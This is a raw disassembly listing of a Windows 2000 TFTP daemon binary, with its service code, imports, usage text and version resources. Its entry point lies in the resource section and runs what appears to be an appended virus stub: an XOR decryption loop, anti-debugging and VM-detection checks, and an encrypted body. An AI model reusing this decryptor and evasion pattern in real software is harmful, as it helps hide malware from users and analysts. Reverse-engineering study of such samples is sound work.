					; sub_10039D6+4Dj
		push	1
		pop	eax
		jmp	short loc_1003A38
; ---------------------------------------------------------------------------


loc_1003A2E:				; CODE XREF: sub_10039D6+Cj
		mov	ecx, [ebp+arg_4]
		xor	eax, eax
		cmp	[ecx], al
		setz	al


loc_1003A38:				; CODE XREF: sub_10039D6+51j
					; sub_10039D6+56j
		pop	edi
		pop	esi
		pop	ebp
		retn	8
sub_10039D6	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: thunk


sub_1003A3E	proc near		; CODE XREF: sub_1001A91+5p
					; sub_100230A+8p ...
		jmp	ds:dword_100116C
sub_1003A3E	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: thunk


sub_1003A44	proc near		; CODE XREF: sub_10018DB+FEp
					; sub_1002219+DAp
		jmp	ds:dword_1001138
sub_1003A44	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: thunk


sub_1003A4A	proc near		; CODE XREF: sub_1001FA6+1Fp
					; sub_1001FA6+43p
		jmp	ds:dword_100113C
sub_1003A4A	endp

; ---------------------------------------------------------------------------
		push	ebp
		mov	ebp, esp
		push	0FFFFFFFFh
		push	offset dword_1001560
		push	offset loc_1003BF0
		mov	eax, large fs:0
		push	eax
		mov	large fs:0, esp
		add	esp, 0FFFFFFE0h
		push	ebx
		push	esi
		push	edi
		mov	[ebp-18h], esp
		mov	dword ptr [ebp-4], 0
		push	1
		call	ds:dword_10010C4
		add	esp, 4
		mov	dword_10062D0, 0FFFFFFFFh
		mov	dword_10062D4, 0FFFFFFFFh
		call	ds:dword_10010C8
		mov	ecx, dword_100600C
		mov	[eax], ecx
		call	ds:dword_10010CC
		mov	edx, dword_1006008
		mov	[eax], edx
		mov	eax, ds:dword_10010D0
		mov	ecx, [eax]
		mov	dword_10062D8, ecx
		call	nullsub_2
		mov	eax, dword_1005DC4
		test	eax, eax
		jnz	short loc_1003AE1
		push	offset loc_1003BD0
		call	ds:dword_1001084
		add	esp, 4


loc_1003AE1:				; CODE XREF: .text:01003AD1j
		call	sub_1003BB0
		push	offset dword_100500C
		push	offset dword_1005008
		call	sub_1003BA6
		add	esp, 8
		mov	edx, dword_1006004
		mov	[ebp-28h], edx
		lea	eax, [ebp-28h]
		push	eax
		mov	ecx, dword_1006000
		push	ecx
		lea	edx, [ebp-20h]
		push	edx
		lea	eax, [ebp-2Ch]
		push	eax
		lea	ecx, [ebp-1Ch]
		push	ecx
		call	ds:dword_1001080
		add	esp, 14h
		push	offset dword_1005004
		push	offset dword_1005000
		call	sub_1003BA6
		add	esp, 8
		call	ds:dword_10010D8
		mov	edx, [ebp-20h]
		mov	[eax], edx
		mov	eax, [ebp-20h]
		push	eax
		mov	ecx, [ebp-2Ch]
		push	ecx
		mov	edx, [ebp-1Ch]
		push	edx
		call	sub_1001570
		add	esp, 0Ch
		mov	[ebp-24h], eax
		push	eax
		call	ds:dword_10010EC
		jmp	short loc_1003B80
; ---------------------------------------------------------------------------
		mov	eax, [ebp-14h]
		mov	ecx, [eax]
		mov	ecx, [ecx]
		mov	[ebp-30h], ecx
		push	eax
		push	ecx
		call	sub_1003BA0
		add	esp, 8
		retn
; ---------------------------------------------------------------------------
		mov	esp, [ebp-18h]
		mov	edx, [ebp-30h]
		push	edx
		call	ds:dword_10010DC+4


loc_1003B80:				; CODE XREF: .text:01003B5Cj
		add	esp, 4
		mov	dword ptr [ebp-4], 0FFFFFFFFh
		mov	ecx, [ebp-10h]
		mov	large fs:0, ecx
		pop	edi
		pop	esi
		pop	ebx
		mov	esp, ebp
		pop	ebp
		retn
; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================

; Attributes: thunk


sub_1003BA0	proc near		; CODE XREF: .text:01003B6Ap
		jmp	ds:dword_10010DC
sub_1003BA0	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: thunk


sub_1003BA6	proc near		; CODE XREF: .text:01003AF0p
					; .text:01003B2Bp
		jmp	ds:dword_100107C
sub_1003BA6	endp

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================



sub_1003BB0	proc near		; CODE XREF: .text:loc_1003AE1p
		push	30000h
		push	10000h
		call	sub_1003BF6
		add	esp, 8
		retn
sub_1003BB0	endp

; ---------------------------------------------------------------------------
		align 10h


loc_1003BD0:				; DATA XREF: .text:01003AD3o
		xor	eax, eax
		retn
; ---------------------------------------------------------------------------
		align 10h
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_2. PRESS KEYPAD "+" TO EXPAND]
		align 10h


loc_1003BF0:				; DATA XREF: .text:01003A5Ao
		jmp	ds:dword_10010C0

; =============== S U B	R O U T	I N E =======================================

; Attributes: thunk


sub_1003BF6	proc near		; CODE XREF: sub_1003BB0+Ap
		jmp	ds:dword_10010BC
sub_1003BF6	endp

; ---------------------------------------------------------------------------
		dd 3D7Ch, 2 dup(0FFFFFFFFh), 3E60h, 10F4h, 3CA4h, 2 dup(0FFFFFFFFh)
		dd 4012h, 101Ch, 3C88h,	2 dup(0FFFFFFFFh), 40A2h, 1000h
		dd 3DCCh, 2 dup(0FFFFFFFFh), 4172h, 1144h, 3DC0h, 2 dup(0FFFFFFFFh)
		dd 41A2h, 1138h, 3D04h,	2 dup(0FFFFFFFFh), 42F6h, 107Ch
		dd 5 dup(0)
		dd 4092h, 4020h, 407Eh,	4070h, 4052h, 403Eh, 0
		dd 3E6Ch, 3FF6h, 3FE6h,	3FCEh, 3FBEh, 3FB2h, 3FA2h, 3E7Ah
		dd 3E8Ah, 3EA0h, 3EB0h,	3ECCh, 3EDAh, 3EF2h, 3EFEh, 3F0Ch
		dd 3F24h, 3F3Ch, 3F56h,	3F62h, 3F70h, 3F78h, 3F92h, 0
		dd 4282h, 4272h, 428Eh,	4230h, 4226h, 421Eh, 4214h, 420Ah
		dd 4200h, 41F8h, 41F0h,	41E6h, 41DCh, 41D2h, 41CAh, 41C2h
		dd 4302h, 42E2h, 42D0h,	42C2h, 42B2h, 42A2h, 41B8h, 4262h
		dd 4254h, 424Ch, 423Ah,	4242h, 41B0h, 0
		dd 3E52h, 8000006Fh, 80000073h,	3E08h, 80000009h, 3E1Ah
		dd 8000000Fh, 3E34h, 8000000Ah,	3E42h, 80000003h, 8000000Ch
		dd 80000002h, 80000037h, 80000017h, 80000014h, 0
		dd 417Ch, 4190h, 0
		dd 4126h, 4168h, 415Eh,	4154h, 4142h, 4130h, 411Ah, 4112h
		dd 410Ah, 40F4h, 40EAh,	40D4h, 40B0h, 40C2h, 0
		dd 53570019h, 65764541h, 6553746Eh, 7463656Ch, 1B0000h
aWsagetoverlapp	db 'WSAGetOverlappedResult',0
		align 4
a2		db '2',0
aWsarecvfrom	db 'WSARecvFrom',0
		dw 0Fh
aWsacloseevent	db 'WSACloseEvent',0
		db '=',0
aWsasocketa	db 'WSASocketA',0
		align 10h
aWs2_32_dll	db 'WS2_32.dll',0
		align 4
aM		db '',0
aExitprocess	db 'ExitProcess',0
		dw 12Dh
aGetlasterror	db 'GetLastError',0
		align 2
		dw 2FDh
aWaitforsingleo	db 'WaitForSingleObject',0
a4		db '4',0
aCreateeventa	db 'CreateEventA',0
		align 10h
		db 0C5h	; 
		db 1, 49h, 6Eh
aItializecritic	db 'itializeCriticalSection',0
		dd 654801B6h, 72437061h, 65746165h, 1DE0000h
aLeavecriticals	db 'LeaveCriticalSection',0
		align 2
		dw 1BAh
aHeapfree	db 'HeapFree',0
		align 2
		dw 1Eh
aClosehandle	db 'CloseHandle',0
aO		db 'o',0
aEntercriticals	db 'EnterCriticalSection',0
		align 4
		retf
; ---------------------------------------------------------------------------
		db 1, 49h, 6Eh
aTerlockedincre	db 'terlockedIncrement',0
		align 4
		db 0FBh	; 
		db 2, 57h, 61h
aItformultipleo	db 'itForMultipleObjects',0
		align 2
		dw 1B4h
aHeapalloc	db 'HeapAlloc',0
		dw 252h
aResetevent	db 'ResetEvent',0
		align 10h
		retn
; ---------------------------------------------------------------------------
		db 2, 53h, 6Ch
		db  65h	; e
		db 65h,	70h, 0
		db 0D8h	; 
		db 2, 54h, 72h
aYentercritical	db 'yEnterCriticalSection',0
		dw 2C5h
aSuspendthread	db 'SuspendThread',0
		dw 254h
aResumethread	db 'ResumeThread',0
		db 0, 90h, 2
aSetevent	db 'SetEvent',0
		align 2
		dw 29Ch
aSetlasterror	db 'SetLastError',0
		align 2
aZ		db 'Z',0
aDeletecritical	db 'DeleteCriticalSection',0
		dw 12Fh
aGetlocaltime	db 'GetLocalTime',0
		align 2
aP		db '',0
aExpandenvironm	db 'ExpandEnvironmentStringsA',0
aKernel32_dll	db 'KERNEL32.dll',0
		align 10h
		db 0E5h	; 
		db 1, 53h, 74h
aArtservicectrl	db 'artServiceCtrlDispatcherA',0
		dw 1DFh
aSetservicestat	db 'SetServiceStatus',0
		align 2
		dw 1B9h
aRegisterservic	db 'RegisterServiceCtrlHandlerA',0
		db  84h	; 
		db 1, 52h, 65h
aGclosekey	db 'gCloseKey',0
		dw 1A7h
aRegqueryvaluee	db 'RegQueryValueExA',0
		align 2
		dw 19Dh
aRegopenkeyexa	db 'RegOpenKeyExA',0
aAdvapi32_dll	db 'ADVAPI32.dll',0
		align 10h
		db  50h	; P
		db 2, 52h, 74h
aLregisterwait	db 'lRegisterWait',0
		dw 184h
aRtlcreatetimer	db 'RtlCreateTimer',0
		align 4
		db  85h	; 
		db 1, 52h, 74h
aLcreatetimerqu	db 'lCreateTimerQueue',0
		dw 42Eh
a_chkstk	db '_chkstk',0
		db 0A1h	; 
		db 1, 52h, 74h
aLderegisterwai	db 'lDeregisterWaitEx',0
		dw 433h
a_itoa		db '_itoa',0
		dw 450h
aAtoi		db 'atoi',0
		align 2
		dw 43Dh
a_stricmp	db '_stricmp',0
		align 2
		dw 46Dh
aMemmove	db 'memmove',0
		dd 7452019Dh, 6C65446Ch, 54657465h, 72656D69h, 2990000h
		dd 556C7452h, 74616470h, 6D695465h, 7265h, 6F740486h, 65776F6Ch
		dd 45F0072h, 70757369h,	726570h, 7473047Dh, 70636E72h
		dd 746E0079h, 2E6C6C64h, 6C6C64h, 6F4E004Fh, 79666974h
		dd 72646441h, 6E616843h, 6567h,	65470022h, 41704974h, 54726464h
		dd 656C6261h, 70690000h, 61706C68h, 642E6970h, 6C6Ch, 78650246h
		dd 7469h, 7270029Bh, 66746E69h,	2430000h, 6D697463h, 2540065h
		dd 65706F66h, 17F006Eh,	646B6D5Fh, 7269h, 655F00C5h, 6F6E7272h
		dd 0AA0000h, 6468635Fh,	7269h, 697402CDh, 656Dh, 7266025Bh
		dd 6565h, 63660249h, 65736F6Ch,	2A40000h, 6C616572h, 636F6Ch
		dd 616D028Eh, 636F6C6Ch, 1950000h, 6165725Fh, 0B00064h
		dd 6F6C635Fh, 6573h, 6C5F0141h,	6B656573h, 1840000h, 65706F5Fh
		dd 214006Eh, 6972775Fh,	6574h, 655F00D0h, 746978h, 585F0048h
		dd 46747063h, 65746C69h, 630072h, 5F705F5Fh, 6E695F5Fh
		dd 6E657469h, 580076h, 65675F5Fh, 69616D74h, 6772616Eh
		dd 10C0073h, 696E695Fh,	72657474h, 82006Dh, 65735F5Fh
		dd 65737574h, 74616D72h, 72726568h, 9B0000h, 6A64615Fh
		dd 5F747375h, 76696466h, 690000h, 5F705F5Fh, 6D6F635Fh
		dd 65646F6Dh, 6E0000h, 5F705F5Fh, 6F6D665Fh, 6564h, 5F5F0080h
		dd 5F746573h, 5F707061h, 65707974h, 0C70000h, 6378655Fh
		dd 5F747065h, 646E6168h, 3372656Ch, 534D0000h, 54524356h
		dd 6C6C642Eh, 0B40000h,	6E6F635Fh, 6C6F7274h, 7066h
		dd 3Ch dup(?)
_text		ends

; Section 2. (virtual address 00005000)
; Virtual size			: 000012DC (   4828.)
; Section size in file		: 000012DC (   4828.)
; Offset to raw	data for section: 00005000
; Flags	C0000040: Data Readable	Writable
; Alignment	: default
; ===========================================================================

; Segment type:	Pure data
; Segment permissions: Read/Write
_data		segment	para public 'DATA' use32
		assume cs:_data
		;org 1005000h
dword_1005000	dd 0		dword_1005004	dd 0		dword_1005008	dd 0		dword_100500C	dd 0		asc_1005010	db ' ================================================================'
					; DATA XREF: sub_1001570+4Do
		db '======== ',0Ah
		db 'Abstract:                                                        '
		db '         ',0Ah
		db ' This implements an RFC 783 tftp daemon.                         '
		db '         ',0Ah
		db ' It listens on port 69 for requests                              '
		db '         ',0Ah
		db ' and spawns a thread to process each request.                    '
		db '         ',0Ah
		db '                                                                 '
		db '         ',0Ah
		db 'TFTPD USAGE and Installation:                                    '
		db '         ',0Ah
		db '                                                                 '
		db '         ',0Ah
		db '  md d:/tftpd                                     (the StartDirec'
		db 'tory).   ',0Ah
		db '  copy //MohsinA_p90/test/tftpd.exe .                            '
		db '         ',0Ah
		db '  sc create tftpd binPath= d:/tftpd/tftpd.exe     (give full path'
		db ').       ',0Ah
		db '  sc query tftpd                                  (check if insta'
		db 'lled).   ',0Ah
		db '                                                                 '
		db '         ',0Ah
		db 'Start:                                                           '
		db '         ',0Ah
		db '    sc start tftpd -f                             (creates a log '
		db 'file).   ',0Ah
		db 'or  sc start tftpd                                               '
		db '         ',0Ah
		db 'or  net start tftpd                                              '
		db '         ',0Ah
		db 'or  sc start tftpd [-dStartDirectory] [-e] [-f]                  '
		db '         ',0Ah
		db '    Options: -e  use event log.                                  '
		db '         ',0Ah
		db '             -f  log to file.                                    '
		db '         ',0Ah
		db '             -dStartDirectory                                    '
		db '         ',0Ah
		db 'Info:                                                            '
		db '         ',0Ah
		db '  sc interrogate tftpd           (logs will be updated).         '
		db '         ',0Ah
		db '  sc query tftpd                 Check whether running.          '
		db '         ',0Ah
		db 'Stop:                                                            '
		db '         ',0Ah
		db '  sc  stop tftpd                                                 '
		db '         ',0Ah
		db '  net stop tftpd                                                 '
		db '         ',0Ah
		db '                                                                 '
		db '         ',0Ah
		db 'Variables that control what files can be read/written and by whom'
		db ':        ',0Ah
		db '   StartDirectory - only files there will be accessible.         '
		db '         ',0Ah
		db '                    LogFile is created here.                     '
		db '         ',0Ah
		db '   ValidClients - Clients matching this ip address can read files'
		db '.        ',0Ah
		db '                    eg. you can set it to "157.55.8?.*"          '
		db '       ',0Ah
		db '   ValidMasters   - clients matching this can write and read file'
		db 's.       ',0Ah
		db '                    eg. you can set it to "" and no one can write'
		db '.      ',0Ah
		db '   ValidReadFiles - only matching files will be served out, eg. "'
		db 'r*.t?t"',0Ah
		db '   ValidWriteFiles- only matching files will be accepted,  eg. "w'
		db '*.txt" ',0Ah
		db '                                                                 '
		db '         ',0Ah
		db 'Client:                                                          '
		db '         ',0Ah
		db '  tftp [-i] servername {get|put} src_file dest_file              '
		db '         ',0Ah
		db '  -i from binary mode, else ascii mode is used.                  '
		db '         ',0Ah
		db '                                                                 '
		db '         ',0Ah
		db ' ================================================================'
		db '======== ',0Ah,0
		align 8
aTftpd		db 'Tftpd',0            ; DATA XREF: sub_1001665+Bo
					; .data:off_1005CB0o
		align 10h
off_1005CB0	dd offset aTftpd	; DATA XREF: sub_1001570:loc_1001646o
					; "Tftpd"
		dd offset sub_1001665
		align 10h
off_1005CC0	dd offset aErrorUndefined ; DATA XREF: sub_100230A+73r
					; "Error undefined"
		dd offset aFileNotFound	; "File	not found"
		dd offset aAccessViolatio ; "Access violation"
		dd offset aDiskFullOrAllo ; "Disk full or allocation exceeded"
		dd offset aIllegalTftpOpe ; "Illegal TFTP operation"
		dd offset aUnknownTransfe ; "Unknown transfer ID"
		dd offset aFileAlreadyExi ; "File already exists"
		dd offset aNoSuchUser	; "No such user"
		dd offset aOptionNegotiat ; "Option negotiation	failure"
		align 8
dword_1005CE8	dd 2Ah,	0Dh dup(0)					; sub_10037BF+87o
dword_1005D20	dd 2Ah,	0Dh dup(0)					; sub_100333A+163o ...
dword_1005D58	dd 2Ah,	0Dh dup(0)					; sub_10037BF+EAo
dword_1005D90	dd 2Ah,	0Ch dup(0)					; sub_10037BF+11Ao
dword_1005DC4	dd 1				align 10h
dword_1005DD0	dd 0							; sub_1001E73:loc_1001F36r ...
dword_1005DD4	dd 0		dword_1005DD8	dd 0							; sub_1001665:loc_100182Er ...
dword_1005DDC	dd 0							; sub_1001665+8Br ...
dword_1005DE0	dd 0							; sub_1001E73:loc_1001F0Cr ...
		align 8
dword_1005DE8	dd 0							; sub_1001A91+2B3o
dword_1005DEC	dd 0							; sub_1001A1F+52r ...
dword_1005DF0	dd 0							; sub_1001A1F+5Ew ...
dword_1005DF4	dd 0							; sub_1001A91+59w ...
dword_1005DF8	dd 0							; sub_10018DB+EFr
dword_1005DFC	dd 0		dword_1005E00	dd 0							; sub_1002219+D5o
		db 3 dup(0)
dword_1005E07	dd 0							; sub_1003910+6Br ...
		align 4
		dd 7Ch dup(0)
dword_1005FFC	dd 0		dword_1006000	dd 0		dword_1006004	dd 0		dword_1006008	dd 0		dword_100600C	dd 0				dd 4 dup(0)
dword_1006020	dd 6 dup(0)						; .text:01001D78o ...
dword_1006038	dd 0							; sub_10018DB+34w ...
dword_100603C	dd 0		dword_1006040	dd 0							; sub_1001DEB:loc_1001E35r
dword_1006044	dd 0							; sub_1001665+DBr ...
dword_1006048	dd 6 dup(0)	dword_1006060	dd 6 dup(0)						; sub_1001A1F+2o ...
dword_1006078	dd 0							; sub_10019F0+Fw ...
dword_100607C	dd 0		dword_1006080	dd 6 dup(0)						; sub_100287F+1o ...
dword_1006098	dd 0							; sub_10018DB+25w ...
dword_100609C	dd 0		dword_10060A0	dd 0							; sub_10018DB+A2r ...
		dd 7 dup(0)
dword_10060C0	dd 0							; sub_1001665:loc_1001857o
dword_10060C4	dd 0		dword_10060C8	dd 0		dword_10060CC	dd 0				dd 0Ch dup(0)
dword_1006100	dd 4 dup(0)						; sub_1002219:loc_10022E9o
dword_1006110	dd 0				align 10h
dword_1006120	dd 0							; sub_1001665+63o ...
dword_1006124	dd 0							; sub_1001665+D1w ...
dword_1006128	dd 0							; sub_1001665+E1w
dword_100612C	dd 0							; sub_1001E73+5Aw ...
dword_1006130	dd 0							; sub_1001E73+60w ...
dword_1006134	dd 0							; sub_1001665+EBw ...
dword_1006138	dd 0							; sub_1001665+F1w ...
		align 10h
dword_1006140	dd 64h dup(0)	dword_10062D0	dd 0		dword_10062D4	dd 0		dword_10062D8	dd 0				align 200h
_data		ends

; Section 3. (virtual address 00007000)
; Virtual size			: 00007400 (  29696.)
; Section size in file		: 00007400 (  29696.)
; Offset to raw	data for section: 00007000
; Flags	E0000060: Text Data Executable Readable	Writable
; Alignment	: default
; ===========================================================================

; Segment type:	Pure code
; Segment permissions: Read/Write/Execute
_rsrc		segment	para public 'CODE' use32
		assume cs:_rsrc
		;org 1007000h
		assume es:nothing, ss:nothing, ds:nothing, fs:nothing, gs:nothing
		dd 3 dup(0)
		dd 10000h, 10h,	80000018h, 3 dup(0)
		dd 10000h, 1, 80000030h, 3 dup(0)
		dd 10000h, 409h, 48h, 7060h, 374h, 4 dup(0)
		dd 340374h, 560000h, 5F0053h, 450056h, 530052h,	4F0049h
		dd 5F004Eh, 4E0049h, 4F0046h, 0
		dd 0FEEF04BDh, 10000h, 50000h, 8560001h, 50000h, 8560001h
		dd 3Fh,	0
		dd 40004h, 1, 3	dup(0)
		dd 2D4h, 530001h, 720074h, 6E0069h, 460067h, 6C0069h, 490065h
		dd 66006Eh, 6Fh, 2B0h, 300001h,	300034h, 300039h, 420034h
		dd 30h,	16004Ch, 430001h, 6D006Fh, 610070h, 79006Eh, 61004Eh
		dd 65006Dh, 0
aMicrosoftCorpo:
		unicode	0, <Microsoft Corporation>,0
aR:
		unicode	0, <r%>
		dd 460001h, 6C0069h, 440065h, 730065h, 720063h,	700069h
		dd 690074h, 6E006Fh, 0
aTcpIpTrivialFi:
		unicode	0, <TCP/IP Trivial file	transfer daemon.>,0
		align 4
a8		db '8',0
		dw 0Ch
		dd 460001h, 6C0069h, 560065h, 720065h, 690073h,	6E006Fh
		dd 0
a5_00_2134_1:
		unicode	0, <5.00.2134.1>,0
a4_0:
		unicode	0, <4>
		dw 0Ah
		dd 490001h, 74006Eh, 720065h, 61006Eh, 4E006Ch,	6D0061h
		dd 65h,	660074h, 700074h, 2E0064h, 780065h, 65h, 280074h
		dd 4C0001h, 670065h, 6C0061h, 6F0043h, 790070h,	690072h
		dd 680067h, 74h, 6F0043h, 790070h, 690072h, 680067h, 200074h
		dd 430028h, 200029h, 69004Dh, 720063h, 73006Fh,	66006Fh
		dd 200074h, 6F0043h, 700072h, 20002Eh, 390031h,	310038h
		dd 31002Dh, 390039h, 39h, 0A003Ch, 4F0001h, 690072h, 690067h
		dd 61006Eh, 46006Ch, 6C0069h, 6E0065h, 6D0061h,	65h, 660074h
		dd 700074h, 2E0064h, 780065h, 65h, 2F007Eh, 500001h, 6F0072h
		dd 750064h, 740063h, 61004Eh, 65006Dh, 0
aMicrosoftRWind:
		unicode	0, <Microsoft(R) Windows (R) 2000 Operating System>,0
		align 4
		db '<',0
		dw 0Ch
		dd 500001h, 6F0072h, 750064h, 740063h, 650056h,	730072h
		dd 6F0069h, 6Eh, 2E0035h, 300030h, 32002Eh, 330031h, 2E0034h
		dd 31h,	44h, 560001h, 720061h, 690046h,	65006Ch, 6E0049h
		dd 6F0066h, 0
		dd 40024h, 540000h, 610072h, 73006Eh, 61006Ch, 690074h
		dd 6E006Fh, 0
		dd 4B00409h, 0Bh dup(0)
		assume ds:_data

; =============== S U B	R O U T	I N E =======================================


		public start

start		proc near
		cld
		call	loc_100742E
start		endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_1007406	proc near		; CODE XREF: .rsrc:0100747Dp
		push	ebx
		mov	ecx, 0DA5h
		mov	ebx, edx


loc_100740E:				; CODE XREF: sub_1007406+13j
		xor	[eax], dx
		lea	eax, [eax+2]
		xchg	dl, dh
		lea	edx, [ebx+edx]
		loop	loc_100740E
		pop	ebx
		retn
sub_1007406	endp

; ---------------------------------------------------------------------------
		db 0A4h, 0CEh
; ---------------------------------------------------------------------------


loc_100741F:				; CODE XREF: .rsrc:01007468j
		pop	ebp
		retn
; ---------------------------------------------------------------------------


loc_1007421:				; CODE XREF: .rsrc:01007436j
					; .rsrc:01007447j
		push	ebp
		mov	eax, 8000h
		xor	ecx, ecx
		jmp	short loc_1007455

; =============== S U B	R O U T	I N E =======================================



sub_100742B	proc near		; CODE XREF: .rsrc:0100744Ap
					; .rsrc:01007450p
		rdtsc
		retn
sub_100742B	endp

; ---------------------------------------------------------------------------


loc_100742E:				; CODE XREF: start+1p
		test	eax, eax
		jnz	short loc_100743A
		int	2Ch		; Internal routine for MSDOS (IRET)
		test	eax, eax
		jns	short loc_1007421
		jmp	short loc_1007449
; ---------------------------------------------------------------------------


loc_100743A:				; CODE XREF: .rsrc:01007430j
		push	eax
		sidt	fword ptr [esp-2]
		pop	eax
		mov	eax, [eax+6]
		shl	eax, 10h
		jns	short loc_1007421


loc_1007449:				; CODE XREF: .rsrc:01007438j
		push	ebp
		call	sub_100742B
		xchg	eax, ecx
		call	sub_100742B


loc_1007455:				; CODE XREF: .rsrc:01007429j
		sub	eax, ecx
		mov	ebp, [esp+4]
		sub	dword ptr [esp+4], 39B6h
		sub	eax, 100h
		jnb	short loc_100741F
		sub	ebp, 301006h
		lea	eax, [ebp+301082h]
		mov	dx, [eax-65h]
		call	sub_1007406
		dec	edi
		into
		stc
		das
		xor	ecx, [ecx+64h]
		push	es
		mov	[edi-59h], eax
		call	far ptr	35EDh:3487F1A7h
		mov	esp, 0AFBF0B0Ah
		push	ebx
		xchg	eax, ebp
		shr	dword ptr [ecx-3EE0337Bh], cl
		and	[ebx], ebx
		mov	bl, [esi+esi*4]
		pop	esi
		xor	esp, [ebx-6Ch]
		cmp	cl, ah
		mov	esp, 0E1F24892h
		js	short near ptr loc_10074E0+1
		aam	0B1h
		aaa
		lds	esp, [ecx]
		assume ds:nothing
		xor	ecx, esp
		icebp
		inc	esp
		out	dx, al
		mov	dl, 0DAh
		aad	0D5h
		xor	ecx, edx
		nop
		mov	ecx, 9B2B19CAh
		into
		rcr	eax, 80h
		aam	5Fh
		inc	ebx
		icebp
		xlat
		rcr	byte ptr [ebx-28CD4EC8h], 7Eh
		test	eax, 6F940A4Dh


loc_10074E0:				; CODE XREF: .rsrc:010074B2j
		rep ficom word ptr [eax]
		cli
		ja	short loc_1007526
		movsb
		outsd
		setalc
		movsb
		dec	ebx
		add	byte ptr [eax+ebp*8+6Dh], 6Ch
		or	al, 5Fh
		add	eax, 0AD14FC68h
		retf
; ---------------------------------------------------------------------------
		dd 4C506F6Fh, 0D4F18087h, 4D9D2210h, 0C56A87B3h, 8D54EFC5h
		dd 7B7F807Dh, 0EDC212F7h, 0F59D291h, 0B3E06177h, 20771318h
		dd 6E72BAE9h
; ---------------------------------------------------------------------------
		aad	0D9h


loc_1007526:				; CODE XREF: .rsrc:010074E4j
		int	0		; - internal hardware -	DIVIDE ERROR
					; Automatically	called at end of DIV or	IDIV operation that results in error
					; or overflow.	 Normally set by DOS to	display	an error message and abort
					; the program.
		dec	esi
		call	far ptr	7495h:0E54146BCh
		mov	esp, 0D9D96BD3h
		xor	eax, 0E80C66A5h
		inc	ebx
		cmp	al, 0Ch
		xor	eax, 0C3FA711Ah	; CODE XREF: .rsrc:01007551j
		dec	esi
		icebp
		icebp
		push	ss
		db	65h
		sbb	al, 71h
		cmp	[ebx], dh
		xlat
		push	ebp
		fstp9	st(2)
		pop	edi
		jns	short near ptr loc_100753E+2
		sbb	[edi], bh


loc_1007555:				; CODE XREF: .rsrc:01007590j
		push	ds
		fistp	word ptr [esi-552DD1E1h]
		db	67h
		and	al, 38h
		bound	esp, [esp+edx]
		mov	ecx, 5E336Bh
		db	65h
		stc
		jz	short loc_1007593
		jnp	short near ptr loc_10075E2+4
		pop	esp


loc_100756E:				; CODE XREF: .rsrc:010075C2j
		adc	[eax], cl
		push	ss
		push	ebx
		aas
		inc	edi
		jns	short loc_10075D7
		cmc
		xchg	eax, ecx
		loopne	near ptr loc_10075A3+2
		popa
		xchg	eax, edi
		aaa
		db	36h
		test	[ebp+48599914h], eax
		sbb	al, 1Ah
		retf	0E4F0h
; ---------------------------------------------------------------------------
		db 8Eh,	0CDh, 0C8h
		dd 0CF952D1Ch
; ---------------------------------------------------------------------------
		jl	short loc_1007555
		pop	eax


loc_1007593:				; CODE XREF: .rsrc:01007569j
		push	eax
		sbb	[ebx-45h], ch
		mov	al, ds:0A2745969h
		stc
		ficomp	word ptr [edi-66h]
		aad	39h
		popa


loc_10075A3:				; CODE XREF: .rsrc:01007578j
		test	eax, 7F64A582h
		and	ebx, esp
		push	edx
		fdivr	qword ptr [ecx-1F5AC55Ah]
		push	ss
		mov	ds:207CAE52h, al
		dec	ecx
		test	ax, 0D686h
		and	[edx-3Ah], ah
		inc	edi
		rol	ebx, cl
		ja	short loc_100756E
		iret
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------
		dw 3F0Bh
		dd 0D334B888h, 93CF2B4Bh, 1DD7619Dh
		db 3Ch,	21h, 0B5h
; ---------------------------------------------------------------------------


loc_10075D7:				; CODE XREF: .rsrc:01007574j
		pop	ebx
		inc	edx
		mov	ebp, [esi+edx+539AF6F6h]
		in	eax, 0DCh


loc_10075E2:				; CODE XREF: .rsrc:0100756Bj
		or	eax, 0F4DBEB27h
		inc	ebp
		neg	dword ptr [ebx-6]
		sbb	al, 0C0h
		inc	ecx
		mov	[edi-7328FCDDh], ecx
		xor	[eax+58h], bl
		inc	esp
		sbb	bl, ch
		sbb	[ecx], ebx
		push	7679C308h
		add	ebx, ecx
		les	eax, [ebx-50h]
		dec	ebp
		mov	dl, 76h
		dec	ebp
		pushf
		adc	byte ptr [esi-5Ah], 52h
		scasd
		xor	al, 4Eh
		cmp	al, 87h
		lds	edi, [ebp-3Eh]
		pop	esi
		lds	ebp, [edi-1FDF82B0h]
		push	esi
		ud2
; ---------------------------------------------------------------------------
		db 0A2h, 36h, 0E2h
		db 0C1h, 25h
; ---------------------------------------------------------------------------


loc_1007626:				; CODE XREF: .rsrc:01007628j
		sub	al, 13h
		js	short loc_1007626
; ---------------------------------------------------------------------------
		dw 44E4h
		dd 0D319EAEAh, 4400375Dh, 1F73CBD0h, 10E6422Bh,	65CD4BB5h
		dd 73CB1703h, 0B2BA955Ah, 0B1B10D0Fh, 4E4CD07Fh, 0AB96F6F2h
		dd 38E1A465h, 0F77ABD8Fh, 18EE4B23h, 6DF543BDh,	96D31F1Bh
		dd 7147A2A8h, 0C85880EAh, 53C488B7h, 209EFAFAh,	3C116FC7h
		dd 4CDADF8Ah, 0DEFC3859h, 0A444AD50h, 0C52ADC38h, 55481429h
		dd 0E4C01C2Dh, 5E31020Bh, 0D0A0EA02h, 17577574h, 0B6C7ABA3h
		dd 4E3CFA5h, 2EFDCCFCh,	0DD32881h, 3DD87882h, 0F2F8085Dh
		dd 8DA89A27h, 0D7AE08CDh, 6688C0F8h, 0B293EFDEh, 30043BE5h
		dd 0DEFD5FD4h, 0EAEB776Bh, 0DD2B8C9h, 0FAE00715h, 467A221Fh
		dd 20491221h, 0D5268583h, 0C59BF5CCh, 149FEFE2h, 0DB7FDCECh
		dd 9B76C04Eh, 1165F1EAh, 32F3B289h, 75B559A6h, 0FC3A1619h
		dd 0D1308C89h, 0FD8E7F7Bh, 41658E71h, 980A666Bh, 987B5667h
		dd 985CE344h, 0ADFC4C3h, 7CAD2AA1h, 624F2021h, 6207BF16h
		dd 0A5551FE5h, 0DD98F679h, 3B8FDBC0h, 1D29C4E3h, 0A08B2FD1h
		dd 0C9604C44h, 6D59B5B7h, 0F7CC29CFh, 46C02616h, 13390E3Eh
